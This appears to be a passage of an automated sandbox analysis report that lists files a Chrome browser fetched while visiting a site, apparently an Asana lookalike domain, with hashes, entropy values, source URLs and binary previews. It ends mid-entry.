                                                                                                                                                                                                                    Preview:...........i..F........v.m..}+Q%..v.9..GR...n.$A.,...`-........ YR.....".......[.c.1so...|:..>]'...r......>..pQq.....C..ju/...z.;,...UFO.K..w.$.&I....p..{..`P...Z.:.j......T=|m7..Ju.o.N..T.|...;...8..:...W....=...h.YM. \..a.=.h...Jbw....z.....j.X.F..,.....O.w.'onV?E.....~<..u.Fe.h....r)....(.[...y......%3..w.......o.........k..8.....5NWOF..U.V).#.....eoT.,.W..O..c..|.T>..*...l.....~.}......+..R.z..I...g3Z.7.;?).(.7...^.....%.H.I.'.h....?...k/"..l=....x3...'..r...E...4.Y-Boj.........j.-.2..p.M|..I.\nV..K..<...N.V. ...z.`.1D.."?J+..5:.1.l2.r.O9.|K.........d........E...+.'...L#.*.V...~......2Xx.T.....t%HO(.....M+..`1...\2...v..a....,...=...]&... .L... ../..?'.....S...[...{yk.X.Q.&..z)H~.s.w..si.,]T.3..[.%...[.&......-...M.7.?3.]...._..;@(S..R8......e.X.^....I.&......gKV.xc.K.M.....w..&3.t2gK...+..g.....&....RO....d.]3........l:.2..?.<.j.U`....t.QLe..P._v6...4.7R..../7.>.M..CN...A".k.?....l..|.......{..|.Y.}v8...\`=
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 560x373, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):12748
                                                                                                                                                                                                                    Entropy (8bit):7.986011639595796
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:l4QLACoKydVf5YcYqZPSny2spQPDMBIyW+Y:iQkDXXizqdSny2WQPD6IP+Y
                                                                                                                                                                                                                    MD5:CA587E6941A7DC2AD2ACE22A24F087E7
                                                                                                                                                                                                                    SHA1:78032F04642511137CF7039A37720B66C09D4AAA
                                                                                                                                                                                                                    SHA-256:919A938C1410D567FB4885520C2E9169269631ED7484780974AEE322D55612A1
                                                                                                                                                                                                                    SHA-512:F46D3DB95244EA63A986CB5B0CF7E64FBB18EE63BE595F51F24F456AB30AC80A5E3363962A82B535F51D3E400742AE0CD460951DF14EA77C707DB94FE937F0CB
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/card-sony-music-asana-customer.webp
                                                                                                                                                                                                                    Preview:RIFF.1..WEBPVP8 .1.......*0.u.>.B.K%..'...P...en.|4.m..f....i.09..........M....L...'Me._.....{.~..1.....R.../.|..._....&._.........;|A..y........}........*../?u}.J;....(.F.6Q..gQ...l..MQ} u.....9H.V.m.qO...r..."D]..Q..j..BN....Ccnt.r;.A.7...q0.6.!.....>..<i/y.AB..P......s...d.._*.9.\.......c*.qm..Yb~<[...y..+p....`. ~..G.(........:.....J.......W%7...f.....%.!.r.)\..=W../.......*1.G1U.\I...E.L......Ko.^.P2..;F.........i.Q...j}[70........+.|..GG...a..9.rv:....C\4.L..2.e...9.'........x.jQ..>...>(.;G..o^...a......oX..).eygX2...@...#.....An.k..#.P../O..!O..).....p...=........Z......ka7c.6WZ..N+....s......(Q.....c.G(C.pEq...b....^....H....xL"~.C..>U.KEm..*+P...)..b...D..8.$....x..!.A.V.....2.Z..4.w.......V...5...........~h.f..S.".[..<?.T.R.....p.1...[.% ....n5.....Mif.)a....s</SZ.o.x..P....aw..1.. ...J...A.!._.>=R...-.a......d.$...W...NV......../.snx....`j....]d...g..\,..mf...H..\....1.,.t........w.w4.+.......S.d`.."..O..i..Yj...F.v..fP..."...]
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 100x100, 32 bits/pixel
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):41662
                                                                                                                                                                                                                    Entropy (8bit):1.662572295735079
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:3chBFpWObQy//Pn9g15HdJSSoG29mggggggggg5/:+FYObB/Xn9g15H/SSR2N
                                                                                                                                                                                                                    MD5:03789A9CAF871A2C491FCF788FB9519D
                                                                                                                                                                                                                    SHA1:7CA722C5AC96374284EFC40DB654DE76B4F1C7EF
                                                                                                                                                                                                                    SHA-256:A42AE227F92CC034BED8015AF2BB5664327C3EF4C207E3DC6CD06E8642845E77
                                                                                                                                                                                                                    SHA-512:AA6E83B00DB93D851B6A06F6192F1A95138071B61360CC31C03ECF36623C0915FF63D819EE2B802EEA3184B04A8E413E823FC1B22D5637B5AAB4636CFEDD6E1A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:......dd.... .........(...d......... .....@...#...#.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):255
                                                                                                                                                                                                                    Entropy (8bit):5.015115668594466
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:3RsJwouzsY6A++sdLA23MA7DQ6bIrSQnDIQCfym2/MfE5AA62jAn:K+F2AwrDDerSnQCu/MfEeA62A
                                                                                                                                                                                                                    MD5:55232AD9238FC2A9FECFA049BF955A9D
                                                                                                                                                                                                                    SHA1:AE877379E61510943652220A5B230D5B6AB0EF0C
                                                                                                                                                                                                                    SHA-256:A7BE83030BD2D23C8D4110D0723F0AEA40425B63470B53F1EEA660887B77ED1A
                                                                                                                                                                                                                    SHA-512:7CDA8BC759A1AE941AC355FAA80CDECD41BDF04D27DE0F731940D7CC9E523F3892887A9FBDB09403C01183FB7AAC293A5F02B9B6365688E501BFBAE29917685F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors
                                                                                                                                                                                                                    Preview:{. "data": [],. "meta": {. "count": 0. },. "links": {. "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?limit=10&relationships=owner%2Cviewers%2Ceditors". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 5751805
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):1446986
                                                                                                                                                                                                                    Entropy (8bit):7.999281811353761
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:24576:WWh09apVnMn3TxkMIZXSKhIgqvHZiiQYU5aY7IoqjQGElsY1GDvog6QO:vSa0njxHTKhTIZiiVYcSLawsvL6QO
                                                                                                                                                                                                                    MD5:C3C39E7E19C2E4866CC9DC004468118A
                                                                                                                                                                                                                    SHA1:C698A5F4BD405507CA2CFD5342BD5640085C9C9C
                                                                                                                                                                                                                    SHA-256:B07824CBAD2EDF008A85CF3AE092765826750110EDA413864C7CB3B1718BF1C8
                                                                                                                                                                                                                    SHA-512:E22CF2D54A6C4003F04867CE40D80DB1C3B7200DBCBAB4C5ACBC993611D7AF404A69288F73ACFDFA35E4D0A1D15EBE28601FA657542809E22BF3BD4F3FB33DB7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/main.92c57b63482d090b859f.js
                                                                                                                                                                                                                    Preview:...........m[".6.}...=....._..v.b7=*.....v...4R......;"#2....u.u...n....|...32+..W.>~o.2ggw..m....M......Y.qeiyy....8..cv4.3.x.......E...>1...a<..3J....e.6.....!..-/l...-....e~..O.{...!=oG.....u.).Kk.wQt..3{{....=.....p....L......2....rU..39b.JP6.A"..Q....Gq..._w......./..8..g....^...3w.....)...UdD.q..mD.}.D.>c..K.3..8..,.......B4.Z.........V}.Y.(..h.af..9...N..!.E.....h.}...... DX.Q......2..2.k..:;]j..Q.6WcR....3....L...4Z..V..h.T...........q...4.2....q.y...L..k...N..Q_h...v@%@6.T.a.+..R....\"....E..{....F.0s.}..}.(s..n.Cj.!2.,..7.M.o8Y.Jh.=...uE........V.M.[.R.\v.a'...?.h....y...O.S....v..N........gO7.I......Q.....zr.....A.......h(t..AuP.h.z4....>...j..Cp...."....g.........).*..*.....2..N...ss.a.v4......Q....^...!,..b~...._\..D..AT..Qxd..Q.......L. ..L..\>.\.).m..V..........Y.....5..S$.m....s?.........m.Q.n.C(.o0$..;!....*&.../p+.`...1...?..>...(s..j8....M.(.q%.37.a..n..1x'.:....u.)d....f7c.O.e.[..W.*.:6.'T...n.>g.p;....q.....C....`...0
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):23190
                                                                                                                                                                                                                    Entropy (8bit):7.975574955056152
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:D2PAI9kSLt3jkmfGmxLJwS6mfxiUsgxB79xz8PkXmCS7jtn/:D2PR9kSLB6MLH6mfxiUVxB79xz8LCS/t
                                                                                                                                                                                                                    MD5:96854A2B75FC4D55D63766748D832AF1
                                                                                                                                                                                                                    SHA1:669C6FEBC285C157EE6C01CF4F163ECD77AE460E
                                                                                                                                                                                                                    SHA-256:27F2158C80A69CF91F07A171F9A2BA3F82EE7690CAB4D03EAF13BBD540811188
                                                                                                                                                                                                                    SHA-512:DDE8EE1DFCED47EEA7DFA4F15DA9BAF796ABA4990873575B8CBBF77170133BA50B385FEA8105759517A9B769EDA1568E89A663189A3DB5B645DD612B19057CC3
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFF.Z..WEBPVP8X...........a..ALPH......"...?[....I;"..k....._...DM.l .F.g.i.........<.@...NDL.Cj...A...2.!.!..!..B.......y.""..W..uK.c.\...}qc$.E_...I..hD}n..Q.UZ6#..ht}..d|]/....Y..w..3.g.]...6.......v...].m...\y[1....?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?..................a.m.9Z;#..!...!...7 .....G....~.u.........j}JK2......eB.r=.Z.`.[.R3.r.......%?...VP8 .W..Po...*..b.>.H.L..?. .y....in.B...y...n......X.W.T~...P..:/...O>_0.h^...:.=.zc..3 |.............?.7...........Y+........C.7....y./.c.....?......_.1>..$..........W}.;W..@_]>...._....M.....3....._.........O...?...|..B.%.i.....O..M...........o.O._..v.......
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):15552
                                                                                                                                                                                                                    Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                                                    MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                    SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                    SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                    SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                    Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 19738
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):7828
                                                                                                                                                                                                                    Entropy (8bit):7.970978417312552
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:Ub4UQAdpaF6VhIqc9dcag0e5foUK3Hyr2mGHrGiQRn7U9LwMn:UkHAdp46VhHc7cagVw3HOXGHFQRnKwM
                                                                                                                                                                                                                    MD5:61D37AE2BBF5334EAEDD2CE7ADB81074
                                                                                                                                                                                                                    SHA1:1B9C1EC66AA1705D921082B786ECB7FBF02BBA71
                                                                                                                                                                                                                    SHA-256:4A0541EE665423AD7E24D7792B58D1B205D81F1C79FBA108386AD739AE692EA6
                                                                                                                                                                                                                    SHA-512:CDEAA26DC75DD13E492119970EE62D75519B534BA334425BE5B363DC1CED59354AC661B37DC8517DBFDE5CBE9B0CB6CCA82470AF4958A057489B877A55DF7479
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/static/qrcode.min.js
                                                                                                                                                                                                                    Preview:...........\.r.8.~.[[..$..]4.....;.M.{v.q..%q#.*.........@.....q.vc...}Gw...0;....t...Mr..ib....(.r.>_...-....w/^^../>]....K...a...|^..:.....?K3.+..."...iP.h..d./.t..Y.n.S...~..3..,.2..n..{fE..$.:....].....x<v.".t'....,.;p:.......q...Ck[...h..c.c4|..`..N.Q....^..@k ._.p..p..:......{lc..ll..M.[....".xl.L...X.]7.z..r...36...........bDV."....U.vs{.eZ..,K!.,.n....h.DrVh.f...d.\.-..M.C?..x..,".....x.C.J$2.D<..^..J..|..wGItw..0..z.U.Gv..PI?;._ON....&......ds....,...p...%.........G_...L.wj2/..$_...*.....V. .7....{.W)..){...)...+...k<..4kn.Qv6....|.%.0.fi<m..<Z........y.5..c......a~...#..i.'.i.....<....L.........m..U".J.h.....V0.;.sD.......h2Q..2........acv..ur.m[sQ.k...(RJQ...,.Y{..[@.1......%. .c.BHv}...P..p..-..Ga0..'.C.u.._|.....|.C..v>....-.8...-AB..%.k..t..)M..i2?".)..ys..yJf...#X 9.Q.Z.^*..k..j.2m.]..Q....B..-X9-.{..l....~s...Q.t.M...nEdb.Ny.(...I.....4Cm...^`98.(."^.../%0vQ.3........N.4:...h..y.&.u..S..2........c.%.U~.(l.m..`.^j.xq.ZZ0`....a.o....a.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):268889
                                                                                                                                                                                                                    Entropy (8bit):5.618055202497017
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:vAQX5NzJEYLceF+hYTnXP9RIMGN0B5Y0iy:Y+xJRkNty
                                                                                                                                                                                                                    MD5:528ECA937D062FA283F0FAECFE38CE8E
                                                                                                                                                                                                                    SHA1:FA9C47BA7CAA6ACABF8DF13AF04F62B8D3A0A142
                                                                                                                                                                                                                    SHA-256:F75B0D985A0BA1BE3A8202DC3083025AA8019BA55F056DF520864F5A030A3F46
                                                                                                                                                                                                                    SHA-512:5A2D90D48B425AF8BD16AB1EC575A6550237AA492247C35F9E32011584CFC035F819DABF5074E28F9A65C45EBDDF458BE60F7BA96A72871D5A0790849D4580DF
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-BLNDV9X2JR&cx=c&_slc=1
                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":11,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":14},{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):23
                                                                                                                                                                                                                    Entropy (8bit):3.6211755429194716
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:YM0uRn:YM0uR
                                                                                                                                                                                                                    MD5:8183B9A40CF91DC91EE64E402122F07C
                                                                                                                                                                                                                    SHA1:3F2EAD7013B407FC83ECFDB34B2120003D88982A
                                                                                                                                                                                                                    SHA-256:B3849D6557B393391A2530A78375643A147278269DB19B8855798A1DEC085E53
                                                                                                                                                                                                                    SHA-512:2B2BD2D0F215820ED342BA8E6766EE2B97CC0CD215831FFC587F83A8E4D47AEA23DADF7C1EB6CF8388E6CF4FB77DFA82BDB06115B05437EFA4A94C2ADED08E77
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{"ip":"185.152.66.230"}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):3484
                                                                                                                                                                                                                    Entropy (8bit):7.770021974049758
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:RBmn15J0qHXp6Ss5XcftlLkfoB7tSj1YBkjw/+YYKxuQhZx:G1UqHXp6SttlaBjI0izrPhT
                                                                                                                                                                                                                    MD5:D3BA22E3EF1AE9DE5E758F396EB64208
                                                                                                                                                                                                                    SHA1:127376C707EE7A6D255E05BE6DAD5BE3870FB5D7
                                                                                                                                                                                                                    SHA-256:12E56D63E493B58A98CBB219094155CB3FF5DF767FE56C9D2500742EF0B55F81
                                                                                                                                                                                                                    SHA-512:E9E985FBCCA4FBCFCC29523A39E8DA9A8782435D0433219B111B1272C6F5AA57B9B2384915B5A0A31BE2FF92599475697288C4A9DB2E23C2FCE2878E8609DFCA
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/HOME24-web-hero-gartner-2x-en-US.webp
                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X......../.....ALPH.....g` ..O`........N.m.'.f.....b....I;uB...>WQ...O...U0.0...W..uLR.=.r..V......S..)....=.....+..............?............?............?............?............?............?.......H.t.....GW..]...".wOL..'*R.........:o..0.J.VP8 .........*0. .>.H.L..." ..`...in.wZ..0.-%w..........'..../b|..}.*.?3.q.....q.-...s...}...u....H.E.J1.../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi....../.....^.j.2.zi...f...k.3F.y.....o..}..<.q...7.[.....WY...M]fU...../....]/i.5u.x.4..e..'.x.4..e.l]+...../..{..(1.../..-..u.x.4..e...p...4..e....t../.....^........^.....e...WY...=.Wq..>b..O=..R}.e.g.]..lw.y..~.d./.....^.`30...s............jm..8&..".X/.L{R.7....\.q9G...W.6..[&...,0.`..S....I...Mm...Z...cJ1.../......Z. .....8yn..X......s..AwY.._T><..,.a......`..'k.....f..%.uC5C.pI]t..4..e...WY..~.p+.?%..... j....ia.J..
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):29050
                                                                                                                                                                                                                    Entropy (8bit):7.974981283106669
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:fOLZy5yyhnsspS/xw+Cn34Ah7LiSu045yTG5t0wkk+q:fOs5l1pS6+Oh7LiSurt+/q
                                                                                                                                                                                                                    MD5:A4EE9E394AC7AAFAB4429D9148C36288
                                                                                                                                                                                                                    SHA1:16E9D330298A257FE1CA884E3FC8C0FCF9BCB22A
                                                                                                                                                                                                                    SHA-256:61B5DEB295305A04EF52E9758D565D2A4EA275F034D2034F52B4F877C6809B04
                                                                                                                                                                                                                    SHA-512:C6D4464EFF0D86C9252C94EE7506AB959E9B26D2D2FEB00B3D57A0146A4CCACA2CEC3F30E62AE667B7ECFE4D35F9D3F22D75528A64DD5F040BCC57A8E61189FF
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:RIFFrq..WEBPVP8X...........a..ALPH......P...I......8(...q@.D..../!. .u...p.../)y?.y...~I..V.S.K.../..K....K...W.T.(...d...rI...%a......]R.%".%i/.[.6G....pI.9o.......Z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................{..7.m.....1gm[D..jD.9...Qz...CL.....|m...l.7....;.k...c......S....j=...%.?...s...i...VP8 .n.......*..b.>.H.L..#%.3.....in.B...^!Mc.:.n........2......}.?..R..."t.~..N.'.o..........G....}1....m.....5......E.K....S.....'............W.....7...w../...?..s.....I...=.Z_.......}7...o.....z,.M.k..?....!.!............*......._.>._...../...O.k........{S.....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1856
                                                                                                                                                                                                                    Entropy (8bit):4.089901702031411
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:Ix86d2mtM90QX9t9tLSB7SVoxo7GoW0f+Spr/gzVRvD:Ilu0QD9UBKNp/07
                                                                                                                                                                                                                    MD5:F8B6BBC8C40AA784FCD903F13FE7D0AF
                                                                                                                                                                                                                    SHA1:24304334B7C0F2C77B72A26B200511D73404FC6B
                                                                                                                                                                                                                    SHA-256:CD9D5277E4BD00CB842065285E9A983E365AC96BA4156F072378BA43470BBC69
                                                                                                                                                                                                                    SHA-512:5F3F8A9D45AFF27104E1A2CEB9B74B28C98960752732F64D6D39E8E1022CC4F5B823AFA90B3220F7FB9C726907302C519C20976BB7EDF86EDF5AD5BAD4B49D90
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:<svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M75 0C71.0444 0 67.1776 1.17298 63.8886 3.37061C60.5996 5.56824 58.0362 8.69181 56.5224 12.3463C55.0087 16.0009 54.6126 20.0222 55.3843 23.9018C56.156 27.7814 58.0608 31.3451 60.8579 34.1421C63.6549 36.9392 67.2186 38.844 71.0982 39.6157C74.9778 40.3874 78.9992 39.9913 82.6537 38.4776C86.3082 36.9638 89.4318 34.4004 91.6294 31.1114C93.827 27.8224 95 23.9556 95 20C94.9693 14.7051 92.8523 9.63589 89.1082 5.89179C85.3641 2.1477 80.2949 0.0307062 75 0ZM75 37.962C71.4475 37.962 67.9747 36.9085 65.0209 34.9349C62.067 32.9612 59.7648 30.1559 58.4053 26.8738C57.0458 23.5916 56.6901 19.9801 57.3831 16.4958C58.0762 13.0115 59.7869 9.81098 62.299 7.29895C64.811 4.78692 68.0115 3.0762 71.4958 2.38313C74.9801 1.69007 78.5916 2.04577 81.8738 3.40528C85.1559 4.76478 87.9612 7.06701 89.9349 10.0208C91.9086 12.9747 92.962 16.4475 92.962 20C92.9648 22.3596 92.5021 24.6965 91.6004 26.877C90.6987 29.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 1585
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):781
                                                                                                                                                                                                                    Entropy (8bit):7.7738092272729284
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:XTcLR8MHP+EeyIwDUsgvCcf9I+5qbVCtHwI46+Kq/Z5DjcmHWyENgtO4Pn:XoF8GPBIwQ7NfWbVG4JKqvGw
                                                                                                                                                                                                                    MD5:03F9A199DE440515863C4F0DC966CE1D
                                                                                                                                                                                                                    SHA1:EE61EF3191D24C499A4E6500F5956724B69E1DF8
